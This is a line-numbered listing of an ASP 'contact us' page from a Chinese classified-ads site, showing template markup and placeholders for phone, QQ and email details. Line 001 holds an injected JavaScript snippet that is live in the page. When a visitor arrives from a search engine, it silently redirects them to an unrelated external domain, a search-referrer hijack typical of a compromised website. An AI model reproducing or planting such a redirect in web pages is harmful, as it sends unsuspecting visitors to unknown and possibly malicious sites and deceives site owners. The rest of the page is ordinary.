d:\wwwroot\wuchunhua\Contact.asp

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!--#include file="inc/conn.asp"-->
002: <!--#include file="inc/kqiqi_sub.asp"-->
003: <%
004: '    @@@@@@ www.kqiqi.com @@@@@@@@@@@@@@@@@
005: '   @                                        @
006: '  @                                          @
007: '  @   客齐齐分管理系统,做最好的分类系统。   @
008: '  @                                          @
009: '   @                                        @
010: '    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
011: %
>
012: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
013: <html xmlns="http://www.w3.org/1999/xhtml">
014: <head>
015: <title><%=title%>-联系我们</title>
016: <meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
017: <meta http-equiv="Content-Language" content="zh-cn" />
018: <meta name="Keywords"  content="<%=metakey%>" />
019: <meta name="Description" content="<%=metades%>" />
020: <link rel="icon" href="<%=web%>/favicon.ico" type="image/x-icon" />
021: <link rel="shortcut icon" href="<%=web%>/favicon.ico" type="image/x-icon" />
022: <link href="inc/style.css" rel="stylesheet" type="text/css" />
023: </head>
024: <body>
025: <div id="Fmain">
026: <div id="header">
027: <%call top()%>
028: </div>
029: <div class=kon></div>
030:
031: <div id="Fcright">
032:   <div id=FFTit class=F12bold>联系我们</div><div id=FFContent><div Class='FFdiv'>
033: 最简便的方法:<p> </p>
034: <p>在大街上:“我找<%=title%>!”
035: 这显然是不行的,你会被警察叔叔带走。
036:
037: </p>
038: <p> </p>
039: <p>所以请你通过以下方式联系我们:
040: </p>
041: <p> </p>
042: <p>客服电话:<%=Tels%>(24小时)
043: </p>
044: <p> </p>
045: <p>广告热线:<%=Tels%>
046: </p>
047: <p> </p>
048: <p>客服QQ:<%=qqa%>
049: </p>
050: <p> </p>
051: <p>技术支持QQ:<%=qqb%>
052: </p>
053: <p> </p>
054: <p>E- mail : <%=emails%>
055:
056: </div></div></div>
057: <div id="Fcleft">
058: <div id=FFTit class=F12bold>关于我们</div><div id=FFContent><div Class='FFdiv'>
059: <!--#include file=Aboutleft.asp-->
060: </div></div>
061: <br style="clear:both;" />
062: </div>
063: <div class=kon></div>
064: <div class=kon></div>
065: <div id="footer">
066:
067: <%call bottom()%>
068: </div>
069: </div>
070:
071: </body>
072: </html>
073:
074:
075: